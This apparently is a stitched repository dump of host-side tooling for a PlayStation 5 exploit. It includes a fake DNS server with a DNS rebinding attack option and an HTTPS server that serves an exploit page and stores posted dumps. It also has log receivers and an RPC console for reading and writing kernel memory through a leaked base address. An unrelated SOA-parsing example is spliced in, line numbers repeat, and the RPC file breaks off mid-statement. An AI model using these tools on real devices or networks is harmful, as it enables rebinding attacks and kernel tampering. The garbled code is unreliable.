447 | if self.match_history[addr] >= self.rebind_threshold:
448 | return next(self.rebinds)
449 |
450 | # plus one
451 | else:
452 | self.match_history[addr] += 1
453 |
454 | # add new client to this match history
455 | else:
456 | self.match_history[addr] = 1
457 |
458 | # We didn't trip on any rebind rules (or didn't have any)
459 | # but we're returning a rule-based entry based on the match
460 | return next(self.ips)
461 |
462 |
463 | # Error classes for handling rule issues; the message is also passed to Exception so it shows in the traceback
464 | class RuleError_BadRegularExpression(Exception):
465 |     def __init__(self, lineno):
466 |         msg = "Malformed Regular Expression on rulefile line #%d" % lineno
467 |         print("\n!! %s\n\n" % msg)
468 |         super().__init__(msg)
469 |
470 |
471 | class RuleError_BadRuleType(Exception):
472 |     def __init__(self, lineno):
473 |         msg = "Rule type unsupported on rulefile line #%d" % lineno
474 |         print("\n!! %s\n\n" % msg)
475 |         super().__init__(msg)
476 |
477 |
478 | class RuleError_BadFormat(Exception):
479 |     def __init__(self, lineno):
480 |         msg = "Not Enough Parameters for rule on rulefile line #%d" % lineno
481 |         print("\n!! %s\n\n" % msg)
482 |         super().__init__(msg)
477 |
478 |
479 | class RuleEngine2:
480 |
481 | # replaces the self keyword, but could be expanded to any keyword replacement
482 | def _replace_self(self, ips):
483 | # Deal with the user putting "self" in a rule (helpful if you don't know your IP)
484 | for ip in ips:
485 | if ip.lower() == 'self':
486 | try:
487 | self_ip = socket.gethostbyname(socket.gethostname())
488 | except socket.error:
489 | print(">> Could not get your IP address from your " \
490 | "DNS Server.")
491 | self_ip = '127.0.0.1'
492 | ips[ips.index(ip)] = self_ip
493 | return ips
494 |
495 |
496 | def __init__(self, file_):
497 | """
498 | Parses the DNS Rulefile, validates the rules, replaces keywords
499 | """
500 |
501 | # track DNS requests here
502 | self.match_history = {}
503 |
504 | self.rule_list = []
505 |
506 | # A lol.com IP1,IP2,IP3,IP4,IP5,IP6 rebind_threshold%Rebind_IP1,Rebind_IP2
507 | with open(file_, 'r') as rulefile:
508 | rules = rulefile.readlines()
509 | # enumerate from 1 so that error messages report the real rulefile line number (blank and comment lines count too)
510 | for lineno, rule in enumerate(rules, 1):
511 |
512 |     # ignore blank lines or lines starting with a hashmark (comments)
513 |     if len(rule.strip()) == 0 or rule.lstrip()[0] == "#":
514 |         # thank you to github user cambid for the comments suggestion
515 |         continue
516 |
517 |     # Confirm that the rule has at least three columns to it
518 |     if len(rule.split()) < 3:
519 |         raise RuleError_BadFormat(lineno)
520 |
521 |     # break the rule out into its components
522 |     s_rule = rule.split()
523 |     rule_type = s_rule[0].upper()
524 |     domain = s_rule[1]
525 |     ips = s_rule[2].split(',') # allow multiple IPs separated by commas
526 |
527 |     # only try this if the rule is long enough
528 |     if len(s_rule) == 4:
529 |         rebinds = s_rule[3]
530 |         # handle old rule style (maybe someone updated)
531 |         if '%' in rebinds:
532 |             rebind_threshold, rebinds = rebinds.split('%', 1)
533 |             try:
534 |                 rebind_threshold = int(rebind_threshold)
535 |             except ValueError:
536 |                 raise RuleError_BadFormat(lineno)
537 |         else:
538 |             # in the old days we assumed a rebind thresh of 1
539 |             rebind_threshold = 1
540 |         rebinds = rebinds.split(',') # split in both styles: Rule expects a list, not a string
541 |     else:
542 |         rebinds = None
543 |         rebind_threshold = None
544 |
545 |     # Validate the rule
546 |     # make sure we understand this type of response
547 |     if rule_type not in TYPE.values():
548 |         raise RuleError_BadRuleType(lineno)
549 |     # attempt to parse the regex (if any) in the domain field
550 |     try:
551 |         domain = re.compile(domain, flags=re.IGNORECASE)
552 |     except re.error: # a bare except would also swallow KeyboardInterrupt
553 |         raise RuleError_BadRegularExpression(lineno)
554 |
555 |     # replace self in the list of ips and list of rebinds (if any)
556 |     ips = self._replace_self(ips)
557 |     if rebinds is not None:
558 |         rebinds = self._replace_self(rebinds)
559 |
560 |     # Deal With Special IPv6 Nonsense
561 |     if rule_type == "AAAA": # already upper-cased above
562 |         tmp_ip_array = []
563 |         for ip in ips:
564 |             if ip.lower() == 'none':
565 |                 tmp_ip_array.append(ip)
566 |                 continue
567 |             if _is_shorthand_ip(ip):
568 |                 ip = _explode_shorthand_ip_string(ip)
569 |             ip = binascii.unhexlify(ip.replace(":", ""))
570 |             tmp_ip_array.append(ip)
571 |         ips = tmp_ip_array
572 |
573 |     # add the validated and parsed rule into our list of rules
574 |     self.rule_list.append(Rule(rule_type, domain, ips, rebinds, rebind_threshold))
577 |
578 | print(">> Parsed %d rules from %s" % (len(self.rule_list),file_))
579 |
580 |
581 | def match(self, query, addr):
582 | """
583 | See if the request matches any rules in the rule list by calling the
584 | match function of each rule in the list
585 | The rule checks two things before it continues so I imagine this is
586 | probably still fast
587 | """
588 | for rule in self.rule_list:
589 | result = rule.match(query.type, query.domain, addr)
590 | if result is not None:
591 | response_data = result
592 |
593 | # Return Nonefound if the rule says "none"
594 | if response_data.lower() == 'none':
595 | return NONEFOUND(query).make_packet()
596 |
597 | response = CASE[query.type](query, response_data)
598 |
599 | print(">> Matched Request - " + query.domain.decode())
600 | return response.make_packet()
601 |
602 | # if we got here, we didn't match.
603 | # Forward a request that we didn't have a rule for to someone else
604 |
605 | # if the user said not to forward requests, and we are here, it's time to send a NONEFOUND
606 | if args.noforward:
607 | print(">> Don't Forward %s" % query.domain.decode())
608 | return NONEFOUND(query).make_packet()
609 | try:
610 |     with socket.socket(type=socket.SOCK_DGRAM) as s: # closed even when recv() raises
611 |         s.settimeout(3.0)
612 |         addr = (args.dns, 53)
613 |         s.sendto(query.data, addr)
614 |         data = s.recv(4096) # responses with EDNS can exceed the classic 512 bytes
615 |     print("Unmatched Request " + query.domain.decode())
616 |     return data
618 | except socket.error as e:
619 | # We shouldn't wind up here but if we do, don't drop the request
620 | # send the client *something*
621 | print(">> Error was handled by sending NONEFOUND")
622 | print(e)
623 | return NONEFOUND(query).make_packet()
624 |
625 |
626 | # Convenience method for threading.
627 | def respond(data, addr, s):
628 | p = DNSQuery(data)
629 | response = rules.match(p, addr[0])
630 | s.sendto(response, addr)
631 | return response
632 |
633 | # Capture Control-C and handle here
634 | def signal_handler(signal, frame):
635 | print('Exiting...')
636 | sys.exit(0)
637 |
638 |
639 | if __name__ == '__main__':
640 |
641 | parser = argparse.ArgumentParser(description='FakeDNS - A Python DNS Server')
642 | parser.add_argument(
643 | '-c', dest='path', action='store', required=True,
644 | help='Path to configuration file')
645 | parser.add_argument(
646 | '-i', dest='iface', action='store', default='0.0.0.0', required=False,
647 | help='IP address you wish to run FakeDns with - default all')
648 | parser.add_argument(
649 | '-p', dest='port', action='store', default=53, required=False,
650 | help='Port number you wish to run FakeDns')
651 | parser.add_argument(
652 | '--rebind', dest='rebind', action='store_true', required=False,
653 | default=False, help="Enable DNS rebinding attacks - responds with one "
654 | "result the first request, and another result on subsequent requests")
655 | parser.add_argument(
656 | '--dns', dest='dns', action='store', default='8.8.8.8', required=False,
657 | help='IP address of the upstream dns server - default 8.8.8.8'
658 | )
659 | parser.add_argument(
660 | '--noforward', dest='noforward', action='store_true', default=False, required=False,
661 | help='Sets if FakeDNS should forward any non-matching requests'
662 | )
663 |
664 | # todo: remove this - it's confusing, and we should be able to set this per-record. Keep for now for quickness.
665 | parser.add_argument(
666 | '--non-authoritative', dest='non_authoritative', action='store_true', default=False, required=False,
667 | help='Sets if FakeDNS should not report as an authority for any matching DNS Queries'
668 | )
669 |
670 | args = parser.parse_args()
671 |
672 | # --non-authoritative simply negates the default authoritative setting
673 | args.authoritative = not args.non_authoritative
675 |
676 | # Default config file path.
677 | path = args.path
678 | if not os.path.isfile(path):
679 | print('>> Please create a "dns.conf" file or specify a config path: ' \
680 | './fakedns.py -c [configfile]')
681 | exit(1)
682 |
683 | rules = RuleEngine2(path)
684 | rule_list = rules.rule_list
685 |
686 | interface = args.iface
687 | port = args.port
688 |
689 | try:
690 | server = ThreadedUDPServer((interface, int(port)), UDPHandler)
691 | except socket.error:
692 | print(">> Could not start server -- is another program on udp:{0}?".format(port))
693 | exit(1)
694 |
695 | server.daemon_threads = True # ThreadingMixIn attribute (server.daemon is not one): handler threads don't block exit
696 |
697 | # Tell python what happens if someone presses ctrl-C
698 | signal.signal(signal.SIGINT, signal_handler)
699 | server.serve_forever() # blocks until shutdown(); Ctrl-C exits through signal_handler
--------------------------------------------------------------------------------
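The SOA answer that fakedns.py's SOA class assembles (each name as literal labels ending in a 0xC00C compression pointer to the question name, then five 32-bit fields, with a two-byte big-endian RDLENGTH), as an added stand-alone example that is not part of this repository: it builds a constructed sample response packet and parses it back, following the compression pointer and checking RDLENGTH against the decoded RDATA. The zone values and names below are constructed samples, not the project's dns.conf.

```python
import struct

def encode_labels(name):
    """Length-prefixed labels for a dotted name, without the terminating zero byte."""
    return b"".join(bytes([len(label)]) + label.encode() for label in name.split(".") if label)

def name_with_pointer(prefix, pointer_offset=12):
    """FakeDns-style name: literal labels (e.g. 'ns1') followed by a compression
    pointer (top two bits set) to the query name, which always sits at offset 12."""
    return encode_labels(prefix) + struct.pack(">H", 0xC000 | pointer_offset)

def build_soa_rdata(mname, rname, serial, refresh, retry, expire, minimum):
    """SOA RDATA per RFC 1035 3.3.13: MNAME, RNAME, then five unsigned 32-bit fields."""
    rdata = name_with_pointer(mname) + name_with_pointer(rname)
    return rdata + struct.pack(">IIIII", serial, refresh, retry, expire, minimum)

def read_name(packet, offset):
    """Decode a name at offset, following compression pointers; returns
    (dotted_name, offset just after the name as it appears in the packet)."""
    labels, end, jumped, seen = [], offset, False, set()
    while True:
        length = packet[offset]
        if length & 0xC0 == 0xC0:                      # two-byte pointer
            target = struct.unpack(">H", packet[offset:offset + 2])[0] & 0x3FFF
            if target in seen:
                raise ValueError("compression pointer loop")
            seen.add(target)
            if not jumped:
                end = offset + 2
            jumped, offset = True, target
            continue
        offset += 1
        if length == 0:                                # root label ends the name
            if not jumped:
                end = offset
            return ".".join(labels), end
        labels.append(packet[offset:offset + length].decode())
        offset += length

def build_soa_answer_packet(qname, **soa):
    """Constructed sample response: 12-byte header, one question, one SOA answer."""
    header = struct.pack(">HHHHHH", 0x1234, 0x8400, 1, 1, 0, 0)  # QR + AA, one answer
    question = encode_labels(qname) + b"\x00" + struct.pack(">HH", 6, 1)  # SOA, IN
    rdata = build_soa_rdata(**soa)
    # owner name is a pointer to the question name; RDLENGTH is two bytes, big-endian
    answer = struct.pack(">H", 0xC00C) + struct.pack(">HHIH", 6, 1, 3600, len(rdata)) + rdata
    return header + question + answer

def parse_first_answer(packet):
    """Skip header and question; return (owner, type, rdlength, soa_fields)."""
    _, offset = read_name(packet, 12)                  # QNAME
    offset += 4                                        # QTYPE, QCLASS
    owner, offset = read_name(packet, offset)
    rtype, _rclass, _ttl, rdlength = struct.unpack(">HHIH", packet[offset:offset + 10])
    rdata_start = offset + 10
    mname, offset = read_name(packet, rdata_start)
    rname, offset = read_name(packet, offset)
    fields = struct.unpack(">IIIII", packet[offset:offset + 20])
    if rdata_start + rdlength != offset + 20:
        raise ValueError("RDLENGTH does not match the decoded RDATA")
    return owner, rtype, rdlength, (mname, rname) + fields
```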
/host.py:
--------------------------------------------------------------------------------
1 | import os
2 | import re
3 | import ssl
4 | import time
5 | from http.server import HTTPServer, SimpleHTTPRequestHandler
6 |
7 | DOC_ROOT = '/document/en/ps5/'
8 |
9 | class RequestHandler(SimpleHTTPRequestHandler):
10 |     def replace_locale(self):
11 |         # serve the English page tree whatever two-letter locale the console requests
12 |         self.path = re.sub(r'^/document/(\w{2})/ps5/?', DOC_ROOT, self.path)
13 |
14 |     def do_GET(self):
15 |         self.replace_locale()
16 |         return super().do_GET()
17 |
18 |     def do_POST(self):
19 |         self.replace_locale()
20 |         # strip the exact prefix; str.lstrip() would strip a character set, not a prefix
21 |         tn = self.path[len(DOC_ROOT):] if self.path.startswith(DOC_ROOT) else self.path
22 |         # basename keeps a client-supplied path from escaping the working directory
23 |         tn = os.path.basename(tn)
24 |         length = int(self.headers.get('Content-Length', 0))
25 |         body = self.rfile.read(length)
26 |         self.send_response(204) # acknowledge so the console's request completes
27 |         self.end_headers()
28 |         fn = tn + '.bin' # '.json'
29 |         if not tn.startswith("T_"):
30 |             if fn != "a.bin":
31 |                 # plain log message from the exploit page, not a dump to be saved
32 |                 print('!POST!: INFO: ' + body.decode('utf-8', 'replace'))
33 |                 return
34 |             fn = time.strftime("%Y%m%d-%H%M%S") + ".json"
35 |
36 |         print('!POST!: ' + self.path + ' -->> ' + fn)
37 |         print('test: %d' % length)
38 |         with open(fn, "wb") as f:
39 |             f.write(body)
40 |
41 |
42 | server_address = ('0.0.0.0', 443)
43 | httpd = HTTPServer(server_address, RequestHandler)
44 | # ssl.wrap_socket() was removed in Python 3.12; an SSLContext does the same job
45 | context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
46 | context.load_cert_chain(certfile='localhost.pem')
47 | httpd.socket = context.wrap_socket(httpd.socket, server_side=True)
48 | print('running server')
49 | httpd.serve_forever()
50 |
--------------------------------------------------------------------------------
/klogclient.py:
--------------------------------------------------------------------------------
1 | import socket
2 |
3 | def recv_klog():
4 |     host = '10.0.0.169'
5 |     port = 9081
6 |
7 |     with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
8 |         s.settimeout(60) # 60 second timeout, matching the message below (without it the timeout branch never runs)
9 |         s.connect((host, port))
10 |         while True:
11 |             try:
12 |                 data = s.recv(0x100)
13 |                 if not data:
14 |                     break
15 |                 # 'replace' avoids a crash when a 0x100-byte chunk splits a multi-byte character
16 |                 print(data.decode('utf-8', 'replace'))
17 |             except socket.timeout:
18 |                 print("[ERROR] Timeout reached for receiving data (1 min)\n")
19 |                 break
20 |             except socket.error:
21 |                 print("[ERROR] Failed to read from socket\n")
22 |                 break
23 |     # the with block closes the socket
24 |
25 | if __name__ == '__main__':
26 |     recv_klog()
--------------------------------------------------------------------------------
/localhost.pem:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/logserver.py:
--------------------------------------------------------------------------------
1 | import socket
2 |
3 | def server_program():
4 |     host = '0.0.0.0'
5 |     port = 5655
6 |
7 |     with socket.socket() as server_socket:
8 |         server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # allow a quick restart
9 |         server_socket.bind((host, port))
10 |         server_socket.listen(1)
11 |         conn, address = server_socket.accept() # accept new connection
12 |
13 |     # the with block closes the connection on every exit path
14 |     with conn:
15 |         conn.settimeout(60) # 60 second timeout
16 |         print("Connection from: " + str(address))
17 |
18 |         while True:
19 |             try:
20 |                 data = conn.recv(0x100)
21 |                 if not data:
22 |                     return
23 |                 print("[LOG] " + data.decode('utf-8', 'replace'))
24 |             except socket.timeout:
25 |                 print("[LOG] [ERROR] Timeout reached for receiving data (1 min)\n")
26 |                 return
27 |             except socket.error:
28 |                 print("[LOG] [ERROR] Failed to read from socket\n")
29 |                 return
30 |
31 | if __name__ == '__main__':
32 |     server_program()
--------------------------------------------------------------------------------
/rpcserver.py:
--------------------------------------------------------------------------------
1 | import socket
2 | import time
3 | import struct
4 | import locale
5 |
6 | def rpc_server():
7 | host = '0.0.0.0'
8 | port = 5657
9 |
10 | server_socket = socket.socket()
11 | server_socket.bind((host, port))
12 |
13 | server_socket.listen(1)
14 | conn, address = server_socket.accept() # accept new connection
15 | conn.settimeout(600) # 10 minute timeout
16 |
17 | print("[RPC] Connection from: " + str(address))
18 |
19 | # First, receive the kernel data base address
20 | try:
21 | data = conn.recv(0x100)
22 | if not data:
23 | return
24 | print("[RPC] Received kernel .data base: 0x" + data.decode('utf-8'))
25 | except socket.timeout:
26 | print("Timeout reached for receiving data (10 min)")
27 | return
28 |
29 | # Now, process cmds
30 | cmd = ''
31 | while True:
32 | print("> ", end = '')
33 | cmd = input()
34 |
35 | cmd_parts = cmd.split(' ')
36 |
37 | if cmd_parts[0] == "r" or cmd_parts[0] == "read":
38 | if len(cmd_parts) < 2:
39 | print("Usage: r [addr]")
40 | continue
41 |
42 | read_addr = cmd_parts[1]
43 | read_addr = read_addr.replace("0x", "")
44 |
45 | if len(read_addr) < 16:
46 | print("Usage: r [addr]")
47 | continue
48 |
49 | read_addr_hi = int(read_addr[:8], 16)
50 | read_addr_low = int(read_addr[8:], 16)
51 | read_addr_bin = struct.pack(" 8:
83 | write_val_hi = int(write_val[:8], 16)
84 | write_val_low = int(write_val[8:], 16)
85 | else:
86 | write_val_low = int(write_val, 16)
87 |
88 | write_val_bin = struct.pack("